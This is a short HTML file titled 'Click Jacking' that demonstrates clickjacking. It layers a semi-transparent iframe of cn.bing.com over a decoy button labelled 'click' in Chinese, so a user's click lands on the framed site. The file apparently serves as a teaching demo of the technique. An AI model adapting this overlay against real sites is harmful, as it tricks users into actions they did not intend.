<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Click Jacking</title>
    <style>
        iframe {
            opacity: 0.3;
            filter: alpha(opacity=0);
            position: absolute;
            z-index: 2;
        }

        button {
            position: absolute;
            top: 150px;
            left: 750px;
            z-index: 1;
            width: 110px;
            height: 34px;
        }
    </style>
</head>
<body>

<button>点击</button>
<iframe src="https://cn.bing.com/" height="700" width="950"></iframe>

</body>
</html>
